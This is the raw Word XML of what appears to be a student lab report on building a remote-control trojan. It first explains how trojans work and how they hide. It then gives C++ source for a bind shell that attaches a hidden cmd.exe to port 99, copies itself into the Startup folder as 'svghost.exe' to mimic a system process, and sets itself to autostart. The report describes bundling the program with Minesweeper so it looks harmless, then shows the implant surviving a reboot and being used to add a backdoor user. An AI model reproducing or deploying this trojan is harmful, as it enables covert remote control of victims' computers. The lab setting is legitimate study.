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2835910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3554095</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3288665" cy="183769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8665" cy="183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bidi w:val="0"/>
                              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                              <w:ind w:left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学生学号：2251657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bidi w:val="0"/>
                              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                              <w:ind w:left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学生姓名：李若冰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bidi w:val="0"/>
                              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                              <w:ind w:left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完成时间：2024/6/16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bidi w:val="0"/>
                              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                              <w:ind w:left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48"/>
                                <w:szCs w:val="5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3.3pt;margin-top:279.85pt;height:144.7pt;width:258.95pt;z-index:251662336;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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mT2GC3AAAAAsBAAAPAAAAAAAAAAEAIAAAACIA&#10;AABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAwZozzj4CAABn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kinsoku/>
                        <w:wordWrap/>
                        <w:overflowPunct/>
                        <w:bidi w:val="0"/>
                        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                        <w:ind w:left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学生学号：2251657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kinsoku/>
                        <w:wordWrap/>
                        <w:overflowPunct/>
                        <w:bidi w:val="0"/>
                        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                        <w:ind w:left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学生姓名：李若冰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kinsoku/>
                        <w:wordWrap/>
                        <w:overflowPunct/>
                        <w:bidi w:val="0"/>
                        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                        <w:ind w:left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完成时间：2024/6/16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kinsoku/>
                        <w:wordWrap/>
                        <w:overflowPunct/>
                        <w:bidi w:val="0"/>
                        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                        <w:ind w:left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48"/>
                          <w:szCs w:val="5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1071880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>304165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4676140" cy="106045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140" cy="1060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4.4pt;margin-top:23.95pt;height:83.5pt;width:368.2pt;z-index:251660288;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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My5J8LbAAAACgEAAA8AAAAAAAAAAQAgAAAAIgAAAGRy&#10;cy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kDqcxwXOwIAAGc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sz w:val="96"/>
                          <w:szCs w:val="9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96"/>
                          <w:szCs w:val="9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1018540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5902325" cy="154495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41705" y="5377815"/>
                          <a:ext cx="5902325" cy="154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远程控制木马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85pt;margin-top:80.2pt;height:121.65pt;width:464.75pt;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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GyNlKzbAAAACgEAAA8AAAAA&#10;AAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kB4aHAbSgIAAHIEAAAO&#10;AAAAAAAAAAEAIAAAACo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sz w:val="144"/>
                          <w:szCs w:val="1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144"/>
                          <w:szCs w:val="1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远程控制木马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-1120775</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-978535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7665720" cy="1086612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65720" cy="1086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</w:rPr>
        <w:t>木马</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原理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1.1名称由来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木马（Trojan）这个名字来源于古希腊传说(荷马史诗中木马计的故事，Trojan一词的本意是特洛伊的，即代指特洛伊木马，也就是木马计的故事)。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1.2工作原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>特洛伊木马套装程序（Trojan Horse Program）是一种恶意软件，通常包含两个部分：服务端（服务器部分）和客户端（控制器部分）。以下是其完整工作原理的详细描述：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 服务端（服务器部分）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0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服务端是特洛伊木马的核心部分，被设计成植入受害者的计算机中。其主要功能包括：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伪装进程：服务端程序在运行后，会生成一个具有迷惑性的进程名称，模拟合法程序，以隐藏其真实身份。这使得普通用户难以察觉其存在。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端口开放：服务端会在计算机上打开一个或多个网络端口。这些端口用于与黑客的客户端进行通信。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数据传输：服务端会秘密地收集用户敏感信息，如网络游戏密码、即时通信软件密码、上网账号和密码等。然后，这些数据通过开放的端口传输到黑客指定的服务器。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远程控制：通过开放的端口，黑客可以远程连接到受害者的计算机，执行各种操作，例如下载文件、执行程序、截取屏幕等，进一步危害用户的隐私和安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:t>2. 客户端（控制器部分）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>客户端是由黑客使用的控制工具，用于管理和操纵服务端。其主要功能包括：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连接管理：客户端能够连接多个受害者的计算机，方便黑客统一管理。这些连接通过服务端开放的端口实现。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命令发送：黑客通过客户端向服务端发送各种命令，操控受害者的计算机。例如，命令服务端上传或下载文件、记录键盘输入、截屏等。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数据接收：客户端接收并存储服务端传回的敏感数据。这些数据可以包括登录凭证、个人信息等，对黑客具有极高的利用价值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.2.3</w:t>
      </w:r>
      <w:r>
        <w:t>工作流程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植入服务端：黑客通过多种方式将服务端程序植入受害者的计算机中，例如通过钓鱼邮件、恶意下载链接、感染的U盘等。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运行服务端：一旦服务端程序在受害者计算机上运行，它会生成一个伪装进程并打开指定端口，开始监视和记录用户的活动。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建立连接：服务端主动向黑客指定的服务器发送数据包，通知其已成功安装并运行。黑客通过客户端接受这些通知，并建立连接。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远程控制：黑客通过客户端向服务端发送指令，执行各种恶意操作，窃取数据或进一步控制受害者的计算机。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w:t>数据传输：服务端将收集到的敏感信息传回给黑客，黑客通过客户端进行查看和利用。</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2356485"/>
            <wp:effectExtent l="0" t="0" r="1905" b="57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1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>木马隐藏技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0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特洛伊木马（Trojan Horse）程序是一种高度隐蔽的恶意软件，其目的是在不被发现的情况下，控制受害者的计算机并窃取敏感信息。为了实现这一目的，木马程序采取了多种策略来隐藏自己。以下是一些常见的隐藏方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.3.1</w:t>
      </w:r>
      <w:r>
        <w:t>隐藏在任务栏中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0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木马程序通常会隐藏在任务栏中，以避免被用户察觉。这可以通过将程序的Form的Visible属性设为False，以及将ShowInTaskBar属性设为False来实现。这样，当程序运行时，它不会出现在任务栏中，从而降低被发现的可能性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.3.2</w:t>
      </w:r>
      <w:r>
        <w:t>隐形在任务管理器中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0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木马程序还会采取措施在任务管理器中隐藏自己。将程序设为“系统服务”是一种常见的方法。系统服务在Windows系统中通常不会被普通用户注意到，因此木马可以通过这种方式有效地隐藏自己。此外，通过更改进程名称，使其看起来像合法的系统进程，也可以增加隐蔽性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.3.3</w:t>
      </w:r>
      <w:r>
        <w:t>自动启动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为了确保每次计算机启动时木马程序能够自动运行，木马会利用多种Windows系统的自动加载机制。这些机制包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>启动组：将木马程序添加到系统启动组中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Win.ini和System.ini文件：这些初始化文件可以在系统启动时加载特定的程序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注册表：修改注册表中的启动项，使木马程序在系统启动时自动加载。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这些方法确保了木马程序可以在系统启动时悄无声息地运行，而无需用户手动启动。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1.3.4其他隐藏技术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代码混淆和加密：通过混淆和加密技术，使得其代码难以被分析和检测。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进程注入：将自己的代码注入到合法的系统进程中，以躲避检测。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定期自我更新：通过定期更新自己，以避免被杀毒软件检测到。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2.编写远程控制类木马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编写一个反弹shell的木马，能够伪装成其他应用程序，点击运行后能够打开特定的端口，等待客户端连接，客户端使用telnet后，便可反弹拿到shel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。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木马能够实现开机自启动，任务管理器中在应用程序一栏消失，在进程一栏中伪装成其他进程。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2.1环境配置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2.1.1环境需求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操作系统：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windows xp&amp;&amp;windows 10(被攻击机)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Windows 11(攻击机)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编程语言：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C++（使用VC++6.0编写）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2.1.2环境配置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进行windows xp的ISO下载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进行虚拟机配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3154680" cy="3695700"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="2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VC++６.０下载</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="685800" cy="594360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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主机进行TELNET启动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3035935" cy="3552190"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1397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5935" cy="355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21230" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="3810" b="762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123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２</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.２木马程序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２.２.１代码说明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2.2.1.1预设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#pragma comment(lib,"ws2_32.lib")：链接Winsock 2.2库，这是Windows网络编程的基础库。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#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")：设置程序入口点为mainCRTStartup，并将子系统设置为Windows，这样程序可以创建一个窗口应用而不显示控制台窗口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:tblInd w:w="85" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:left w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:bottom w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:right w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D6E3BC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Borders>
            <w:top w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:left w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:bottom w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:right w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          </w:tblBorders>
          <w:shd w:val="clear" w:color="auto" w:fill="D6E3B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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D6E3BC"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="24" w:line="244" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="24" w:line="244" w:lineRule="exact"/>
              <w:ind w:left="15"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
              <w:t>#pragma comment(lib,"ws2_32.lib")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="24" w:line="244" w:lineRule="exact"/>
              <w:ind w:left="15"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
              <w:t>//设置连接器选项</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="24" w:line="244" w:lineRule="exact"/>
              <w:ind w:left="15"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
              <w:t>#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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2.2.1.2start_telnet_session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初始化网络通信环境。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创建套接字，绑定到端口99并开始监听。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接受连接后，隐藏地启动一个CMD进程，并将输入输出重定向到该连接</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:tblInd w:w="85" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:left w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:bottom w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:right w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D6E3BC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Borders>
            <w:top w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:left w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:bottom w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:right w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          </w:tblBorders>
          <w:shd w:val="clear" w:color="auto" w:fill="D6E3B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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D6E3BC"/>
            <w:vAlign w:val="top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start_telnet_session()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WSADATA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wsadata;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SOCKET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listen_socket, client_socket;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sockaddr_in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server_addr;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PROCESS_INFORMATION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process_info;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STARTUPINFO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startup_info;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cmd_path[255];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ZeroMemory(&amp;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process_info,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PROCESS_INFORMATION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ZeroMemory(&amp;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startup_info,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STARTUPINFO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ZeroMemory(&amp;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wsadata,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WSADATA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GetEnvironmentVariable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"COMSPEC"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cmd_path,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(cmd_path));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WSAStartup(0x202, &amp;wsadata);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server_addr.sin_family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AF_INET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server_addr.sin_addr.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s_addr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INADDR_ANY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server_addr.sin_port = htons(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MASTER_PORT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listen_socket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WSASocket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AF_INET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SOCK_STREAM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IPPROTO_TCP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0, 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bind(listen_socket,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sockaddr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*)&amp;server_addr,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(server_addr));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listen(listen_socket, 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addr_size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(server_addr);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client_socket = accept(listen_socket,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sockaddr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*)&amp;server_addr, &amp;addr_size);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startup_info.cb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STARTUPINFO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startup_info.dwFlags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STARTF_USESTDHANDLES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|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STARTF_USESHOWWINDOW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startup_info.wShowWindow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SW_HIDE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startup_info.hStdInput =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HANDLE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)client_socket;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startup_info.hStdOutput =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HANDLE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)client_socket;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startup_info.hStdError =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HANDLE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)client_socket;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CreateProcess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cmd_path,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0,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&amp;startup_info, &amp;process_info);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WaitForSingleObject(process_info.hProcess,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INFINITE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CloseHandle(process_info.hProcess);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CloseHandle(process_info.hThread);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closesocket(listen_socket);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closesocket(client_socket);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WSACleanup();</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="24" w:line="244" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-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2.2.1.3main()函数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程序的主入口，设置自启动并启动Telnet服务。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="8640" w:type="dxa"/>
        <w:tblInd w:w="85" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:left w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:bottom w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:right w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
          <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D6E3BC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Borders>
            <w:top w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:left w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:bottom w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:right w:val="single" w:color="76923C" w:sz="34" w:space="0"/>
            <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
            <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          </w:tblBorders>
          <w:shd w:val="clear" w:color="auto" w:fill="D6E3B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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D6E3BC"/>
            <w:vAlign w:val="top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key_name[100];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process_path[1024];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file_path[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MAX_PATH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system_path[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MAX_PATH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dest_path[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MAX_PATH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GetModuleFileName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file_path,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(file_path));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GetSystemDirectory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(system_path,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(system_path));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snprintf(dest_path,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(dest_path),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"%c%c\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\svghost.exe"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system_path[0], system_path[1]);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CopyFile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(file_path, dest_path,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GetPrivateProfileStringA(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"Main"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"KeyName"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"keyyy"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key_name,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(key_name),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".\\config.ini"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GetPrivateProfileStringA(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"Main"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"ProcessPath"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dest_path, process_path,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(process_path),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".\\config.ini"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set_autostart(key_name, process_path);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start_telnet_session();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="24" w:line="244" w:lineRule="exact"/>
              <w:ind w:left="15"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-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r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
              <w:t xml:space="preserve">    GetPrivateProfileStringA("Main", "ProcessPath", "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\svghost.exe", process_path,  sizeof(process_path), ".\\config.ini");    </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="24" w:line="244" w:lineRule="exact"/>
              <w:ind w:left="15"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
              <w:t xml:space="preserve">    int ret = autopen(key_name, process_path);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="24" w:line="244" w:lineRule="exact"/>
              <w:ind w:left="15"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
              <w:t xml:space="preserve">    open_telnet();  </w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="24" w:line="244" w:lineRule="exact"/>
              <w:ind w:left="15"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
              <w:t xml:space="preserve">    return 0;  </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="24" w:line="244" w:lineRule="exact"/>
              <w:ind w:left="15"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="17365D"/>
                <w:spacing w:val="-1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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２.２.２代码隐藏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使用exebinder将扫雷游戏和我的exe连接起来，当第一次运行扫雷游戏的时候，就可以运行svghost.exe，并且不会在应用程序里面显示，只会在进程里面显示，并且和系统文件很像，所以并不容易被发现，现在输入netstat -an可以发现99端口正在监听。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2815590" cy="2081530"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="2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5590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34590" cy="2134235"/>
            <wp:effectExtent l="0" t="0" r="3810" b="14605"/>
            <wp:docPr id="2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31285" cy="2703830"/>
            <wp:effectExtent l="0" t="0" r="635" b="889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1285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关闭扫雷程序之后，exe仍然在启动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2994660" cy="3238500"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="2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重启电脑，exe仍然在运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2496820"/>
            <wp:effectExtent l="0" t="0" r="3175" b="2540"/>
            <wp:docPr id="2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木马测试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攻击机通过telnet（端口号是99）可以进入被攻击主机的目录，通过木马查看被攻击主机内信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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3.1查看当前目录下的文件内容</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3832860" cy="3832860"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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3.2查看被攻击主机IP信息</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4533900" cy="1859280"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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3.3.添加新的用户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1.net user 查看原有账户，原本只有owner一个用户</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1522730"/>
            <wp:effectExtent l="0" t="0" r="3175" b="127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2.进行hacker用户添加，密码是12345</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1933575"/>
